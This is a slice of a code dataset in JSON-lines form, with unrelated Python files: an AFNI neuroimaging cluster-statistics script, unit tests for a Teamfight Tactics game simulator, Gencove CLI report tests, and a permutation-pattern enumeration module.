f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -setB {setB} \\\n -AminusB \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix {name}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> {script}\")\n \n #run it\n os.system(f'singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script}')\nind_ttest(phase='acquisition',name='acq_group_diff')\nind_ttest(phase='extinction',name='ext_group_diff')\n\ndef ers_cluster(contrast=None,thr=0,nvox=0,mask='../../standard/gm_3mm_thr.nii.gz',tail=None):\n here = os.getcwd()\n folder = contrast\n name = contrast.split('/')[-1]\n os.chdir(folder)\n \n if tail == 'one-sided':\n side = '1sided RIGHT_TAIL'\n elif tail == 'two-sided':\n side = '2sided'\n\n cmap = f'{name}_ClusterMap.nii.gz';os.system(f'rm {cmap}')\n ceff = f'{name}_ClusterEffEst.nii.gz';os.system(f'rm {ceff}')\n\n ctxt = 
f'{name}_cluster.txt';os.system(f'rm {ctxt}')\n where = f'{name}_where.txt';os.system(f'rm {where}')\n \n cmd = f\"3dClusterize -inset {name}_clst-ttest+orig \\\n -ithr 1 \\\n -idat 0 \\\n -mask {mask} \\\n -NN 3 \\\n -{side} p={thr} \\\n -clust_nvox {nvox} \\\n -pref_map {cmap} \\\n -pref_dat {ceff} > {ctxt}\"\n\n \n os.system(cmd)\n \n if os.path.exists(f'{name}_ClusterMap.nii.gz'):\n w_cmd = f\"whereami -coord_file {ctxt}'[13,14,15]' > {where}\"\n os.system(w_cmd)\n \n\n os.chdir(here)\n\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_acquisition',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_extinction',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_acquisition',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_extinction',thr=0.001,nvox=21,tail='one-sided')#21\n\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_phase_diff',thr=0.001,nvox=16,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_phase_diff',thr=0.001,nvox=18,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/acq_group_diff',thr=0.001,nvox=21,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ext_group_diff',thr=0.001,nvox=20,tail='two-sided')\n\n# 3dClusterize -inset healthy_CSpE__CSpA_clst-ttest+tlrc -ithr 1 -idat 0 -mask /scratch/05426/ach3377/standard/gm_1mm_thr.nii.gz -NN 2 -2sided p=0.01 -clust_nvox 498 -pref_map healthy_CSpE__CSpA_ClusterMap.nii.gz -pref_dat healthy_CSpE__CSpA_ClusterEffEst.nii.gz > healthy_CSpE__CSpA_cluster.txt\n","repo_name":"dunsmoorlab/gPPI","sub_path":"afni_sl_stats.py","file_name":"afni_sl_stats.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"343678477","text":"from Simulator.player import Player\nfrom Simulator.pool import pool\nfrom Simulator.champion import champion\nfrom Simulator import champion as c_object\nfrom Simulator.item_stats import trait_items, starting_items\nfrom Simulator.origin_class_stats import origin_class\n\n\ndef setup(player_num=0) -> Player:\n \"\"\"Creates fresh player and pool\"\"\"\n base_pool = pool()\n player1 = Player(base_pool, player_num)\n return player1\n\n\ndef azir_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 4\n p1.buy_champion(champion('azir'))\n p1.move_bench_to_board(0, 0, 0)\n coords = p1.board[0][0].sandguard_overlord_coordinates\n assert p1.board[coords[0][0]][coords[0][1]].name == 'sandguard'\n assert p1.board[coords[1][0]][coords[1][1]].name == 'sandguard'\n p1.move_board_to_board(1, 1, 5, 3)\n assert [5, 3] in p1.board[0][0].sandguard_overlord_coordinates\n p1.move_board_to_bench(0, 0)\n for x in range(7):\n for y in range(4):\n assert p1.board[x][y] is None\n\n p1.buy_champion(champion('azir'))\n p1.move_bench_to_board(0, 0, 0)\n coords = p1.board[0][0].sandguard_overlord_coordinates\n assert p1.board[coords[0][0]][coords[0][1]].name == 'sandguard'\n assert p1.board[coords[1][0]][coords[1][1]].name == 'sandguard'\n assert p1.num_units_in_play == 1\n p1.sell_champion(p1.board[0][0])\n for x in range(7):\n for y in range(4):\n assert p1.board[x][y] is None\n\n\ndef chosen_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 4\n p1.buy_champion(champion('leesin', chosen='duelist'))\n assert p1.chosen == 'duelist'\n p1.move_bench_to_board(0, 0, 0)\n assert p1.team_tiers['duelist'] == 1\n p2 = setup()\n p2.gold = 1000\n 
p2.max_units = 4\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('leesin'))\n assert p1.board[0][0].chosen == 'duelist'\n\ndef end_of_turn_actions_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 3\n for _ in range(8):\n p1.buy_champion(champion('leesin'))\n p1.move_bench_to_board(0, 0, 0)\n p1.buy_champion(champion('nami'))\n p1.move_bench_to_board(0, 1, 0)\n p1.add_to_item_bench('duelists_zeal')\n p1.move_item(0, 1, 0)\n p1.end_turn_actions()\n assert p1.bench[1] is None\n assert p1.bench[2] is not None\n assert p1.team_tiers['duelist'] == 1\n\ndef championDuplicatorTest():\n p1 = setup()\n p1.gold = 1000\n p1. max_units = 10\n p1.buy_champion(champion('leesin'))\n for x in range(4):\n p1.add_to_item_bench('champion_duplicator')\n p1.move_item(0, 0, -1)\n assert p1.item_bench[0] is None\n assert p1.bench[1].name == 'leesin'\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(1, 0, 0)\n print(p1.bench)\n assert p1.board[0][0].stars == 2\n assert p1.gold == 995\n p1.buy_champion(champion('jax'))\n p1.move_bench_to_board(0, 1, 0)\n p1.move_item(2, 1, 0)\n assert p1.bench[0].name == 'jax'\n p1.buy_champion(champion('nami'))\n p1.buy_champion(champion('aphelios'))\n p1.buy_champion(champion('vayne'))\n p1.buy_champion(champion('vi'))\n p1.buy_champion(champion('warwick'))\n p1.buy_champion(champion('teemo'))\n p1.buy_champion(champion('thresh'))\n p1.buy_champion(champion('talon'))\n p1.move_item(3, 3, -1)\n assert p1.item_bench[3] == 'champion_duplicator'\n for x in range(8):\n p1.sell_from_bench(x)\n assert p1.bench[x] is None\n\ndef magneticRemoverTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 10\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('jax'))\n p1.move_bench_to_board(0, 0, 0)\n p1.add_to_item_bench('magnetic_remover')\n p1.add_to_item_bench('magnetic_remover')\n p1.add_to_item_bench('mages_cap')\n for x in range(5):\n p1.add_to_item_bench('deathblade')\n for x in range(2, 5):\n p1.move_item(x, 0, 0)\n for x in range(5, 8):\n p1.move_item(x, 1, -1)\n assert p1.team_composition['mage'] != 0\n p1.move_item(0, 0, 0)\n p1.move_item(1, 1, -1)\n assert p1.team_composition['mage'] == 0\n assert p1.board[0][0].items == []\n assert p1.bench[1].items == []\n\ndef reforgerTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 10\n for x in range(3):\n p1.add_to_item_bench('reforger')\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('jax'))\n p1.buy_champion(champion('nami'))\n p1.add_to_item_bench('sunfire_cape')\n p1.add_to_item_bench('redemption')\n p1.add_to_item_bench('bf_sword')\n p1.add_to_item_bench('spatula')\n p1.add_to_item_bench('elderwood_heirloom')\n p1.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(3, 0, 0)\n p1.move_item(4, 0, 0)\n p1.move_item(5, 0, 0)\n p1.move_item(0, 0, 0)\n assert len(p1.board[0][0].items) == 0\n assert p1.item_bench[0] is None\n p1.move_item(6, 1, -1)\n p1.move_item(7, 1, -1)\n p1.move_item(8, 2, -1)\n p1.move_item(1, 1, -1)\n p1.move_item(2, 2, -1)\n test1 = False\n test2 = False\n test3 = False\n test4 = False\n for x in range(9):\n if p1.item_bench[x] == 'reforger':\n test1 = True\n if p1.item_bench[x] == 'spatula':\n test2 = True\n if p1.item_bench[x] in list(trait_items.values()):\n test3 = True\n if p1.item_bench[x] in starting_items:\n test4 = True\n assert not test1\n assert test2\n assert test3\n assert test4\n\ndef thiefsGloveCombatTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 1\n p2 = setup()\n p2.gold = 1000\n p2.max_units = 1\n 
p1.buy_champion(champion('nami'))\n p2.buy_champion(champion('nami'))\n p1.add_to_item_bench('thieves_gloves')\n p2.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p2.move_bench_to_board(0, 0, 0)\n p1.move_item(0, 0, 0)\n p2.move_item(0, 0, 0)\n p1.add_to_item_bench('deathblade')\n p1.move_item(0, 0, 0)\n assert p1.item_bench[0] == 'deathblade'\n c_object.run(c_object.champion, p1, p2)\n assert p1.board[0][0].items[0] == 'thieves_gloves'\n\ndef thiefsGlovesTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 1\n p1.buy_champion(champion('azir'))\n p1.buy_champion(champion('garen'))\n p1.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(0, 0, 0)\n assert p1.board[0][0].items[0] == 'thieves_gloves'\n for x in range(3):\n p1.start_round(x)\n p1.move_board_to_board(0, 0, 6, 3)\n p1.start_round(3)\n p1.move_board_to_bench(6, 3)\n p1.start_round(4)\n p1.sell_from_bench(0)\n p1.buy_champion(champion('azir'))\n p1.move_item(0, 0, -1)\n p1.start_round(5)\n\ndef kaynTests():\n p1 = setup()\n p2 = setup(1)\n p1.gold = 500\n p2.gold = 500\n p1.max_units = 10\n p2.max_units = 10\n p1.buy_champion(champion('kayn'))\n p1.move_bench_to_board(0, 0, 0)\n for x in range(3):\n p1.start_round(x)\n p2.start_round(x)\n p2.buy_champion(champion('kayn'))\n p2.move_bench_to_board(0, x, 0)\n assert p1.kayn_transformed, 'Kayn should transform after his third round in combat'\n assert not p2.kayn_transformed\n assert p1.item_bench[0] == 'kayn_shadowassassin'\n assert p1.item_bench[1] == 'kayn_rhast'\n p2.start_round(3)\n assert p2.kayn_transformed\n p1.move_item(0, 0, 0)\n assert p2.item_bench[0] == 'kayn_shadowassassin'\n assert p2.item_bench[1] == 'kayn_rhast'\n for x in range(7):\n for y in range(4):\n if p2.board[x][y]:\n p2.move_item(1, x, y)\n break\n assert p1.kayn_form == 'kayn_shadowassassin'\n assert p2.kayn_form == 'kayn_rhast'\n p1.buy_champion(champion('kayn'))\n assert p1.bench[0].kayn_form == 'kayn_shadowassassin'\n for x in range(10):\n assert not p1.item_bench[x]\n\ndef level2Champion():\n \"\"\"Creates 3 Zileans, there should be 1 2* Zilean on bench\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 10\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 2, \"champion should be 2*\"\n for x in range(1, 9):\n assert p1.bench[x] is None, \"these slot should be empty\"\n for x in p1.board:\n for y in x:\n assert y is None, \"the board should be empty\"\n\n\ndef level3Champion():\n \"\"\"Creates 9 Zileans, there should be 1 3* Zilean on bench\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 1000\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 2\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[1].stars == 2\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 3, \"champion should be 3*\"\n for x in range(1, 9):\n assert p1.bench[x] is None, \"this slot should be empty\"\n for x in p1.board:\n for y in x:\n assert y is None, \"the board should be empty\"\n\n\ndef levelChampFromField():\n \"\"\"buy third copy while 1 copy on field\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 1000\n p1.buy_champion(champion(\"zilean\"))\n p1.buy_champion(champion(\"zilean\"))\n p1.move_bench_to_board(1, 0, 0)\n p1.buy_champion(champion(\"zilean\"))\n for x in p1.bench:\n assert x is None, \"bench should be empty\"\n assert p1.board[0][0].stars == 2, \"the unit placed on the field should be 
2*\"\n\n\n# Please expand on this test or add additional tests here.\n# I am sure there are some bugs with the level cutoffs for example\n# Like I do not think I am hitting level 3 on the correct round without buying any exp\ndef buyExp():\n p1 = setup()\n p1.level_up()\n lvl = p1.level\n while p1.level < p1.max_level:\n p1.exp = p1.level_costs[p1.level + 1]\n p1.level_up()\n lvl += 1\n assert lvl == p1.level\n\n\ndef spamExp():\n \"\"\"buys tons of experience\"\"\"\n p1 = setup()\n p1.gold = 100000\n for _ in range(1000):\n p1.buy_exp()\n assert p1.level == p1.max_level, \"I should be max level\"\n assert p1.exp == 0, \"I should not have been able to buy experience after hitting max lvl\"\n\n\ndef incomeTest1():\n \"\"\"first test for gold income\"\"\"\n p1 = setup()\n p1.gold = 15\n p1.gold_income(5)\n assert p1.gold == 21, f\"Interest calculation is messy, gold should be 21, it is {p1.gold}\"\n\n\ndef incomeTest2():\n \"\"\"Check for income cap\"\"\"\n p1 = setup()\n p1.gold = 1000\n p1.gold_income(5)\n assert p1.gold == 1010, f\"Interest calculation is messy, gold should be 1010, it is {p1.gold}\"\n\n\ndef incomeTest3():\n \"\"\"Checks win streak gold\"\"\"\n p1 = setup()\n p1.gold = 0\n p1.win_streak = 0\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 1\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 2\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 3\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 4\n p1.gold_income(5)\n assert p1.gold == 7, f\"Interest calculation is messy, gold should be 7, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 5\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 500\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n\n\ndef incomeTest4():\n \"\"\"Checks loss streak gold\"\"\"\n p1 = setup()\n p1.gold = 0\n p1.loss_streak = 0\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 1\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 2\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 3\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 4\n p1.gold_income(5)\n assert p1.gold == 7, f\"Interest calculation is messy, gold should be 7, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 5\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 500\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n\n\ndef test_list():\n \"\"\"tests all test cases\"\"\"\n azir_test()\n chosen_test()\n end_of_turn_actions_test()\n\n championDuplicatorTest()\n magneticRemoverTest()\n reforgerTest()\n\n 
thiefsGloveCombatTest()\n thiefsGlovesTest()\n\n kaynTests()\n\n level2Champion()\n level3Champion()\n levelChampFromField()\n\n buyExp()\n # spamExp()\n\n # Problem: Interest gets calculated after base income is added\n incomeTest1()\n # Problem: Interest rate not capped\n incomeTest2()\n incomeTest3()\n incomeTest4()\n\n # I would like to go over move commands again before writing test code for that\n pass\n","repo_name":"silverlight6/TFTMuZeroAgent","sub_path":"UnitTests/player_test.py","file_name":"player_test.py","file_ext":"py","file_size_in_byte":13482,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"53"} +{"seq_id":"14961130302","text":"\"\"\"Test reports monthly-usage command.\"\"\"\n\n# pylint: disable=wrong-import-order, import-error\nimport operator\nimport os\n\nfrom click.testing import CliRunner\n\nfrom gencove.client import APIClient, APIClientError # noqa: I100\nfrom gencove.command.reports.cli import monthly_usage\nfrom gencove.tests.decorators import assert_authorization\nfrom gencove.tests.filters import (\n filter_aws_headers,\n filter_jwt,\n replace_gencove_url_vcr,\n)\nfrom gencove.tests.reports.vcr.filters import (\n filter_monthly_usage_report_request,\n filter_report_response_body,\n filter_report_response_filename,\n)\nfrom gencove.tests.upload.vcr.filters import filter_volatile_dates\nfrom gencove.tests.utils import get_response_from_vcr_dict, get_vcr_response\n\nimport pytest\n\nfrom vcr import VCR\n\n\n@pytest.fixture(scope=\"module\")\ndef vcr_config():\n \"\"\"VCR configuration.\"\"\"\n return {\n \"cassette_library_dir\": \"gencove/tests/reports/vcr\",\n \"filter_headers\": [\"Authorization\", \"Content-Length\", \"User-Agent\", \"ETag\"],\n \"filter_post_data_parameters\": [\n (\"email\", \"email@example.com\"),\n (\"password\", \"mock_password\"),\n ],\n \"match_on\": [\"method\", \"scheme\", \"port\", \"path\", \"query\"],\n \"path_transformer\": VCR.ensure_suffix(\".yaml\"),\n \"before_record_request\": [\n replace_gencove_url_vcr,\n filter_monthly_usage_report_request,\n ],\n \"before_record_response\": [\n filter_jwt,\n filter_aws_headers,\n filter_volatile_dates,\n filter_report_response_body,\n filter_report_response_filename,\n ],\n }\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__success( # pylint: disable=too-many-arguments,unused-argument\n credentials, mocker, recording, vcr\n):\n \"\"\"Test monthly usage report success case\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n return_value=response,\n )\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n res = runner.invoke(\n monthly_usage,\n [\n *credentials,\n ],\n )\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"Saved organization monthly usage report CSV\" in res.output\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__success_dates(\n credentials, mocker, recording, vcr\n): # pylint: disable=too-many-arguments,too-many-locals,unused-argument\n \"\"\"Test monthly usage report success case with requested dates\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = 
get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n return_value=response,\n )\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n outfile = \"tempdir/test.csv\"\n res = runner.invoke(\n monthly_usage,\n [\n \"--output-filename\",\n f\"{outfile}\",\n \"--from\",\n \"2021-09\",\n \"--to\",\n \"2021-10\",\n *credentials,\n ],\n )\n\n with open(outfile, \"r\", encoding=\"utf-8\") as fileobj:\n contents = fileobj.readlines()\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"Saved organization monthly usage report CSV\" in res.output\n\n # Confirm columns are as expected\n columns_row = contents[0]\n columns = columns_row.strip().split(\",\")\n assert \"year\" in columns\n assert \"month\" in columns\n assert \"succeeded_samples\" in columns\n assert \"failed_samples\" in columns\n\n # should be two months of data + headers\n assert len(contents) == 3\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__bad_date( # pylint: disable=too-many-arguments,unused-argument\n credentials, mocker, recording, vcr\n):\n \"\"\"Test monthly usage report with bad date value\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n side_effect=APIClientError(\n message=response.content,\n status_code=response.status_code,\n ),\n return_value=response,\n )\n\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n # invoke without --to param\n res = runner.invoke(\n monthly_usage,\n [\n \"--from\",\n \"2023-01\",\n *credentials,\n ],\n )\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"There was an error retrieving the monthly usage report\" in res.output\n assert (\n \"Must provide both 'from' and 'to' query parameters, or neither\" in res.output\n )\n","repo_name":"gncv/gencove-cli","sub_path":"gencove/tests/reports/test_reports_monthly_usage.py","file_name":"test_reports_monthly_usage.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39012568249","text":"import abc\nfrom collections import deque\nfrom itertools import chain\nfrom typing import TYPE_CHECKING, Any, Dict, FrozenSet, Iterable, Optional\n\nimport requests\nfrom sympy import Expr, Symbol, diff, simplify, sympify, var\n\nfrom comb_spec_searcher.utils import taylor_expand\nfrom permuta import Av\nfrom permuta.permutils.symmetry import lex_min\nfrom tilings.exception import InvalidOperationError\nfrom tilings.griddedperm import GriddedPerm\nfrom tilings.misc import is_tree\n\nif TYPE_CHECKING:\n from tilings import Tiling\n\nx = Symbol(\"x\")\n\n\nclass Enumeration(abc.ABC):\n \"\"\"\n General representation of a strategy to enumerate tilings.\n \"\"\"\n\n def __init__(self, tiling: \"Tiling\"):\n self.tiling = tiling\n\n @abc.abstractmethod\n def verified(self) -> bool:\n \"\"\"\n Returns True if 
enumeration strategy works for the tiling.\n \"\"\"\n raise NotImplementedError\n\n def get_genf(self, **kwargs) -> Expr:\n \"\"\"\n Returns the generating function for the tiling.\n\n Raises an InvalidOperationError if the tiling is not verified.\n \"\"\"\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n raise NotImplementedError\n\n def __repr__(self) -> str:\n return \"Enumeration for:\\n\" + str(self.tiling)\n\n\nclass LocalEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a locally enumerable tiling.\n\n A tiling is locally enumerable if the tiling has no crossing obstructions\n or requirements.\n\n There's not universal way of describing a tiling that is locally enumerable\n with a specification.\n \"\"\"\n\n def __init__(self, tiling, no_req=False):\n super().__init__(tiling)\n self.no_req = no_req\n\n def verified(self) -> bool:\n if self.no_req and self.tiling.requirements:\n return False\n return (\n all(gp.is_single_cell() for gp in self.tiling.obstructions)\n and all(self._req_is_single_cell(req) for req in self.tiling.requirements)\n and all(\n gp.is_single_cell()\n for gp in chain.from_iterable(\n ass.gps for ass in self.tiling.assumptions\n )\n )\n )\n\n @staticmethod\n def _req_is_single_cell(req: Iterable[GriddedPerm]) -> bool:\n \"\"\"\n Returns True if all the gridded perm in the iterable are single cell and in\n the same cell.\n \"\"\"\n req_iter = iter(req)\n gp0 = next(req_iter)\n if not gp0.is_single_cell():\n return False\n cell = gp0.pos[0]\n all_cells = chain.from_iterable(gp.pos for gp in req_iter)\n return all(c == cell for c in all_cells)\n\n def get_genf(self, **kwargs) -> Any:\n # pylint: disable=too-many-return-statements\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n\n funcs: Optional[Dict[\"Tiling\", Any]] = kwargs.get(\"funcs\")\n if funcs is None:\n funcs = {}\n if self.tiling.requirements:\n reqs = self.tiling.requirements[0]\n avoided = self.tiling.__class__(\n self.tiling.obstructions + reqs,\n self.tiling.requirements[1:],\n self.tiling.assumptions,\n )\n without = self.tiling.__class__(\n self.tiling.obstructions,\n self.tiling.requirements[1:],\n self.tiling.assumptions,\n )\n avgf = LocalEnumeration(avoided).get_genf(funcs=funcs)\n wogf = LocalEnumeration(without).get_genf(funcs=funcs)\n return wogf - avgf\n if self.tiling in funcs:\n return funcs[self.tiling]\n # also return something entirely different if the root class/not verified\n if self.tiling.dimensions == (1, 1):\n if self.tiling.is_epsilon():\n return 1\n if self.tiling == self.tiling.__class__.from_string(\"01_10\"):\n return 1 + x\n basis = [ob.patt for ob in self.tiling.obstructions]\n basis_str = \"_\".join(map(str, lex_min(basis)))\n uri = f\"https://permpal.com/perms/raw_data_json/basis/{basis_str}\"\n request = requests.get(uri, timeout=10)\n if request.status_code == 404:\n raise NotImplementedError(f\"No entry on permpal for {Av(basis)}\")\n data = request.json()\n if data[\"generating_function_sympy\"] is None:\n raise NotImplementedError(\n f\"No explicit generating function on permpal for {Av(basis)}\"\n )\n return sympify(data[\"generating_function_sympy\"])\n gf = None\n if MonotoneTreeEnumeration(self.tiling).verified():\n gf = MonotoneTreeEnumeration(self.tiling).get_genf()\n if DatabaseEnumeration(self.tiling).verified():\n gf = DatabaseEnumeration(self.tiling).get_genf()\n if gf is not None:\n funcs[self.tiling] = gf\n return gf\n # TODO: should this create a spec as in the 
strategy?\n raise NotImplementedError(\n f\"Not sure how to enumerate the tiling:\\n{self.tiling}\"\n )\n\n\nclass MonotoneTreeEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a monotone tree tiling.\n\n A tiling is a monotone tree if it is local, its cell graph is a tree and\n all but possibly one cell are monotone.\n\n A monotone tree tiling can be described by a tree where the verified object\n are the cells of the tiling.\n \"\"\"\n\n _tracking_var = var(\"t\")\n\n def verified(self):\n no_req_list = all(len(rl) == 1 for rl in self.tiling.requirements)\n num_non_monotone = sum(\n 1 for c in self.tiling.active_cells if not self.tiling.is_monotone_cell(c)\n )\n return (\n self.tiling.dimensions != (1, 1)\n and LocalEnumeration(self.tiling).verified()\n and no_req_list\n and num_non_monotone <= 1\n and is_tree(self.tiling.active_cells, self.tiling.cell_graph())\n )\n\n def _cell_tree_traversal(self, start):\n \"\"\"\n Traverse the tree by starting at `start` and always visiting an entire\n row or column before going somewhere else.\n\n The start vertices is not yielded.\n \"\"\"\n queue = deque(\n chain(\n self.tiling.cells_in_col(start[0]), self.tiling.cells_in_row(start[1])\n )\n )\n visited = set([start])\n while queue:\n cell = queue.popleft()\n if cell not in visited:\n yield cell\n visited.add(cell)\n queue.extend(self.tiling.cells_in_row(cell[1]))\n queue.extend(self.tiling.cells_in_col(cell[0]))\n\n def _visted_cells_aligned(self, cell, visited):\n \"\"\"\n Return the cells that are in visited and in the same row or column as\n `cell`.\n \"\"\"\n row_cells = self.tiling.cells_in_row(cell[1])\n col_cells = self.tiling.cells_in_col(cell[0])\n return (c for c in visited if (c in row_cells or c in col_cells))\n\n def get_genf(self, **kwargs) -> Any:\n # pylint: disable=too-many-locals\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n if self.tiling.extra_parameters:\n raise NotImplementedError(\n \"Not implemented monotone verified with extra parameters.\"\n )\n try:\n start = next(\n c\n for c in self.tiling.active_cells\n if not self.tiling.is_monotone_cell(c)\n )\n except StopIteration:\n start = next(iter(self.tiling.active_cells))\n start_basis = self.tiling.cell_basis()[start][0]\n start_reqs = [[p] for p in self.tiling.cell_basis()[start][1]]\n start_tiling = self.tiling.from_perms(\n obstructions=start_basis, requirements=start_reqs\n )\n start_gf = start_tiling.get_genf()\n F = start_gf.subs({x: x * self._cell_variable(start)})\n visited = set([start])\n for cell in self._cell_tree_traversal(start):\n interleaving_cells = self._visted_cells_aligned(cell, visited)\n substitutions = {\n scv: scv * self._tracking_var\n for scv in map(self._cell_variable, interleaving_cells)\n }\n F_tracked = F.subs(substitutions)\n minlen, maxlen = self._cell_num_point(cell)\n if maxlen is None:\n F = self._interleave_any_length(F_tracked, cell)\n if minlen > 0:\n F -= self._interleave_fixed_lengths(F_tracked, cell, 0, minlen - 1)\n else:\n F = self._interleave_fixed_lengths(F_tracked, cell, minlen, maxlen)\n visited.add(cell)\n F = simplify(\n F.subs({v: 1 for v in F.free_symbols if v != x})\n ) # type: ignore[operator]\n # A simple test to warn us if the code is wrong\n if __debug__:\n lhs = taylor_expand(F, n=6)\n rhs = [len(list(self.tiling.objects_of_size(i))) for i in range(7)]\n assert lhs == rhs, f\"Bad genf\\n{lhs}\\n{rhs}\"\n return F\n\n @staticmethod\n def _cell_variable(cell):\n \"\"\"\n Return the appropriate variable to track 
